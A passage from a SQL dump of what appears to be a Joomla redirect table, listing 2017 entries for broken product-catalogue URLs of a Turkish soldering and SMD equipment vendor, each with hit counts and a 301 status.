00:00:00',301),(9407,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/am100-detail',NULL,'','',272,0,'2017-11-06 14:43:36','0000-00-00 00:00:00',301),(9408,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',546,0,'2017-11-06 14:43:38','0000-00-00 00:00:00',301),(9409,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',551,0,'2017-11-06 14:43:40','0000-00-00 00:00:00',301),(9410,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',539,0,'2017-11-06 14:43:45','0000-00-00 00:00:00',301),(9411,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',545,0,'2017-11-06 14:43:50','0000-00-00 00:00:00',301),(9412,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,ordering',NULL,'','',558,0,'2017-11-06 14:43:55','0000-00-00 00:00:00',301),(9413,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',550,0,'2017-11-06 14:43:56','0000-00-00 00:00:00',301),(9414,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name',NULL,'','',541,0,'2017-11-06 14:44:00','0000-00-00 00:00:00',301),(9415,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',542,0,'2017-11-06 14:44:05','0000-00-00 00:00:00',301),(9416,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc',NULL,'','',548,0,'2017-11-06 14:44:08','0000-00-00 00:00:00',301),(9417,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',279,0,'2017-11-06 14:44:10','0000-00-00 00:00:00',301),(9418,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',540,0,'2017-11-06 14:44:11','0000-00-00 00:00:00',301),(9419,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,category_name',NULL,'','',545,0,'2017-11-06 14:44:15','0000-00-00 00:00:00',301),(9420,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,mf_name',NULL,'','',544,0,'2017-11-06 14:44:18','0000-00-00 00:00:00',301),(9421,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',26,0,'2017-11-06 14:44:20','0000-00-00 00:00:00',301),(9422,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,ordering',NULL,'','',540,0,'2017-11-06 14:44:21','0000-00-00 00:00:00',301),(9423,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',548,0,'2017-11-06 14:44:25','0000-00-00 00:00:00',301),(9424,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',546,0,'2017-11-06 14:44:26','0000-00-00 00:00:00',301),(9425,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',273,0,'2017-11-06 14:44:28','0000-00-00 00:00:00',301),(9426,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/npm-detail',NULL,'','',280,0,'2017-11-06 14:44:30','0000-00-00 00:00:00',301),(9427,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',546,0,'2017-11-06 14:44:31','0000-00-00 00:00:00',301),(9428,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',545,0,'2017-11-06 14:44:36','0000-00-00 00:00:00',301),(9429,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',547,0,'2017-11-06 14:44:40','0000-00-00 00:00:00',301),(9430,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',274,0,'2017-11-06 14:44:43','0000-00-00 00:00:00',301),(9431,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',274,0,'2017-11-06 14:44:45','0000-00-00 00:00:00',301),(9432,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',278,0,'2017-11-06 14:44:46','0000-00-00 00:00:00',301),(9433,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',275,0,'2017-11-06 14:44:48','0000-00-00 00:00:00',301),(9434,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',540,0,'2017-11-06 14:44:51','0000-00-00 00:00:00',301),(9435,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',541,0,'2017-11-06 14:44:53','0000-00-00 00:00:00',301),(9436,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',549,0,'2017-11-06 14:44:55','0000-00-00 00:00:00',301),(9437,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',539,0,'2017-11-06 14:45:05','0000-00-00 00:00:00',301),(9438,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',533,0,'2017-11-06 14:45:07','0000-00-00 00:00:00',301),(9439,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',536,0,'2017-11-06 14:45:09','0000-00-00 00:00:00',301),(9440,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',538,0,'2017-11-06 14:45:12','0000-00-00 00:00:00',301),(9441,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',535,0,'2017-11-06 14:45:14','0000-00-00 00:00:00',301),(9442,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',539,0,'2017-11-06 14:45:17','0000-00-00 00:00:00',301),(9443,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',539,0,'2017-11-06 14:45:20','0000-00-00 00:00:00',301),(9444,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın',NULL,'','',540,0,'2017-11-06 14:45:22','0000-00-00 00:00:00',301),(9445,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',553,0,'2017-11-06 14:45:27','0000-00-00 00:00:00',301),(9446,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı',NULL,'','',545,0,'2017-11-06 14:45:33','0000-00-00 00:00:00',301),(9447,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',540,0,'2017-11-06 14:45:35','0000-00-00 00:00:00',301),(9448,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',537,0,'2017-11-06 14:45:39','0000-00-00 00:00:00',301),(9449,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',533,0,'2017-11-06 14:45:41','0000-00-00 00:00:00',301),(9450,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,ordering',NULL,'','',540,0,'2017-11-06 14:45:44','0000-00-00 00:00:00',301),(9451,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',542,0,'2017-11-06 14:45:51','0000-00-00 00:00:00',301),(9452,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,category_name',NULL,'','',544,0,'2017-11-06 14:45:53','0000-00-00 00:00:00',301),(9453,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,mf_name',NULL,'','',540,0,'2017-11-06 14:45:56','0000-00-00 00:00:00',301),(9454,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',534,0,'2017-11-06 14:45:58','0000-00-00 00:00:00',301),(9455,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,ordering',NULL,'','',544,0,'2017-11-06 14:46:03','0000-00-00 00:00:00',301),(9456,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,product_name',NULL,'','',551,0,'2017-11-06 14:46:08','0000-00-00 00:00:00',301),(9457,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',551,0,'2017-11-06 14:46:09','0000-00-00 00:00:00',301),(9458,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,product_sku',NULL,'','',550,0,'2017-11-06 14:46:14','0000-00-00 00:00:00',301),(9459,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,category_name/dirdesc',NULL,'','',553,0,'2017-11-06 14:46:18','0000-00-00 00:00:00',301),(9460,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,mf_name',NULL,'','',550,0,'2017-11-06 14:46:21','0000-00-00 00:00:00',301),(9461,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',555,0,'2017-11-06 14:46:23','0000-00-00 00:00:00',301),(9462,'http://3s-technologies.com.tr/tr/ueruenler/smd-orta-hızlı/am100-detail',NULL,'','',19,0,'2017-11-06 14:46:23','0000-00-00 00:00:00',301),(9463,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,ordering',NULL,'','',538,0,'2017-11-06 14:46:28','0000-00-00 00:00:00',301),(9464,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,product_name',NULL,'','',531,0,'2017-11-06 14:46:32','0000-00-00 00:00:00',301),(9465,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/by,product_sku',NULL,'','',534,0,'2017-11-06 14:46:37','0000-00-00 00:00:00',301),(9466,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/dirdesc',NULL,'','',537,0,'2017-11-06 14:46:40','0000-00-00 00:00:00',301),(9467,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/e-bar-26-detail',NULL,'','',267,0,'2017-11-06 14:46:44','0000-00-00 00:00:00',301),(9468,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',265,0,'2017-11-06 14:46:46','0000-00-00 00:00:00',301),(9469,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',533,0,'2017-11-06 14:46:47','0000-00-00 00:00:00',301),(9470,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',517,0,'2017-11-06 14:46:49','0000-00-00 00:00:00',301),(9471,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-06 14:46:51','0000-00-00 00:00:00',301),(9472,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',523,0,'2017-11-06 14:46:54','0000-00-00 00:00:00',301),(9473,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',526,0,'2017-11-06 14:46:56','0000-00-00 00:00:00',301),(9474,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',523,0,'2017-11-06 14:47:01','0000-00-00 00:00:00',301),(9475,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',258,0,'2017-11-06 14:47:02','0000-00-00 00:00:00',301),(9476,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',260,0,'2017-11-06 14:47:04','0000-00-00 00:00:00',301),(9477,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',261,0,'2017-11-06 14:47:05','0000-00-00 00:00:00',301),(9478,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',259,0,'2017-11-06 14:47:07','0000-00-00 00:00:00',301),(9479,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim?language=tr-tr',NULL,'','',1,0,'2017-11-06 14:47:09','0000-00-00 00:00:00',301),(9480,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',520,0,'2017-11-06 14:47:10','0000-00-00 00:00:00',301),(9481,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',522,0,'2017-11-06 14:47:14','0000-00-00 00:00:00',301),(9482,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',528,0,'2017-11-06 14:47:15','0000-00-00 00:00:00',301),(9483,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',524,0,'2017-11-06 14:47:21','0000-00-00 00:00:00',301),(9484,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',524,0,'2017-11-06 14:47:22','0000-00-00 00:00:00',301),(9485,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',521,0,'2017-11-06 14:47:27','0000-00-00 00:00:00',301),(9486,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',522,0,'2017-11-06 14:47:29','0000-00-00 00:00:00',301),(9487,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',529,0,'2017-11-06 14:47:34','0000-00-00 00:00:00',301),(9488,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',527,0,'2017-11-06 14:47:37','0000-00-00 00:00:00',301),(9489,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',524,0,'2017-11-06 14:47:39','0000-00-00 00:00:00',301),(9490,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',520,0,'2017-11-06 14:47:44','0000-00-00 00:00:00',301),(9491,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',520,0,'2017-11-06 14:47:47','0000-00-00 00:00:00',301),(9492,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',517,0,'2017-11-06 14:47:52','0000-00-00 00:00:00',301),(9493,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',520,0,'2017-11-06 14:47:53','0000-00-00 00:00:00',301),(9494,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',519,0,'2017-11-06 14:47:55','0000-00-00 00:00:00',301),(9495,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',520,0,'2017-11-06 14:48:00','0000-00-00 00:00:00',301),(9496,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',521,0,'2017-11-06 14:48:02','0000-00-00 00:00:00',301),(9497,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',522,0,'2017-11-06 14:48:07','0000-00-00 00:00:00',301),(9498,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',519,0,'2017-11-06 14:48:08','0000-00-00 00:00:00',301),(9499,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-06 14:48:10','0000-00-00 00:00:00',301),(9500,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',516,0,'2017-11-06 14:48:12','0000-00-00 00:00:00',301),(9501,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',525,0,'2017-11-06 14:48:15','0000-00-00 00:00:00',301),(9502,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',535,0,'2017-11-06 14:48:17','0000-00-00 00:00:00',301),(9503,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',522,0,'2017-11-06 14:48:22','0000-00-00 00:00:00',301),(9504,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',519,0,'2017-11-06 14:48:25','0000-00-00 00:00:00',301),(9505,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız',NULL,'','',513,0,'2017-11-06 14:48:30','0000-00-00 00:00:00',301),(9506,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',515,0,'2017-11-06 14:48:34','0000-00-00 00:00:00',301),(9507,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',512,0,'2017-11-06 14:48:35','0000-00-00 00:00:00',301),(9508,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',513,0,'2017-11-06 14:48:40','0000-00-00 00:00:00',301),(9509,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',516,0,'2017-11-06 14:48:42','0000-00-00 00:00:00',301),(9510,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',512,0,'2017-11-06 14:48:47','0000-00-00 00:00:00',301),(9511,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',521,0,'2017-11-06 14:48:49','0000-00-00 00:00:00',301),(9512,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_sku?language=tr-tr',NULL,'','',8,0,'2017-11-06 14:50:29','0000-00-00 00:00:00',301),(9513,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-06 15:02:23','0000-00-00 00:00:00',301),(9514,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-06 15:09:01','0000-00-00 00:00:00',301),(9515,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',307,0,'2017-11-06 15:15:11','0000-00-00 00:00:00',301),(9516,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1mm-28-detail',NULL,'','',14,0,'2017-11-06 15:24:54','0000-00-00 00:00:00',301),(9517,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',46,0,'2017-11-06 15:30:09','0000-00-00 00:00:00',301),(9518,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name',NULL,'','',235,0,'2017-11-06 15:42:05','0000-00-00 00:00:00',301),(9519,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/jvk-detail',NULL,'','',17,0,'2017-11-06 15:44:43','0000-00-00 00:00:00',301),(9520,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=en-gb',NULL,'','',10,0,'2017-11-06 15:48:09','0000-00-00 00:00:00',301),(9521,'http://www.3s-technologies.com.tr/en/products/konveyorler',NULL,'','',66,0,'2017-11-06 15:58:18','0000-00-00 00:00:00',301),(9522,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-06 15:59:31','0000-00-00 00:00:00',301),(9523,'http://www.3s-technologies.com.tr/en/products/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-06 16:00:29','0000-00-00 00:00:00',301),(9524,'http://3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',15,0,'2017-11-06 16:09:35','0000-00-00 00:00:00',301),(9525,'http://3s-technologies.com.tr/index.php/en/products/flux/by,category_name?language=en-gb',NULL,'','',17,0,'2017-11-06 16:27:53','0000-00-00 00:00:00',301),(9526,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',40,0,'2017-11-06 16:35:12','0000-00-00 00:00:00',301),(9527,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-hız/npm-detail',NULL,'','',365,0,'2017-11-06 16:41:23','0000-00-00 00:00:00',301),(9528,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim',NULL,'','',26,0,'2017-11-06 16:47:46','0000-00-00 00:00:00',301),(9529,'http://3s-technologies.com.tr/en/products/screen-printer',NULL,'','',37,0,'2017-11-06 16:57:06','0000-00-00 00:00:00',301),(9530,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name',NULL,'','',227,0,'2017-11-06 16:58:41','0000-00-00 00:00:00',301),(9531,'http://www.3s-technologies.com.tr/en/products/screen-printer/sp-18p-l-detail',NULL,'','',86,0,'2017-11-06 16:58:58','0000-00-00 00:00:00',301),(9532,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',558,0,'2017-11-06 17:08:13','0000-00-00 00:00:00',301),(9533,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',557,0,'2017-11-06 17:08:16','0000-00-00 00:00:00',301),(9534,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',559,0,'2017-11-06 17:08:17','0000-00-00 00:00:00',301),(9535,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',560,0,'2017-11-06 17:08:19','0000-00-00 00:00:00',301),(9536,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',556,0,'2017-11-06 17:08:22','0000-00-00 00:00:00',301),(9537,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',563,0,'2017-11-06 17:08:26','0000-00-00 00:00:00',301),(9538,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',546,0,'2017-11-06 17:08:29','0000-00-00 00:00:00',301),(9539,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',544,0,'2017-11-06 17:08:37','0000-00-00 00:00:00',301),(9540,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',558,0,'2017-11-06 17:08:39','0000-00-00 00:00:00',301),(9541,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',561,0,'2017-11-06 17:08:43','0000-00-00 00:00:00',301),(9542,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',564,0,'2017-11-06 17:08:47','0000-00-00 00:00:00',301),(9543,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-06 17:08:49','0000-00-00 00:00:00',301),(9544,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',563,0,'2017-11-06 17:08:52','0000-00-00 00:00:00',301),(9545,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',558,0,'2017-11-06 17:08:55','0000-00-00 00:00:00',301),(9546,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',559,0,'2017-11-06 17:08:57','0000-00-00 00:00:00',301),(9547,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',555,0,'2017-11-06 17:08:58','0000-00-00 00:00:00',301),(9548,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-06 17:09:01','0000-00-00 00:00:00',301),(9549,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',568,0,'2017-11-06 17:09:05','0000-00-00 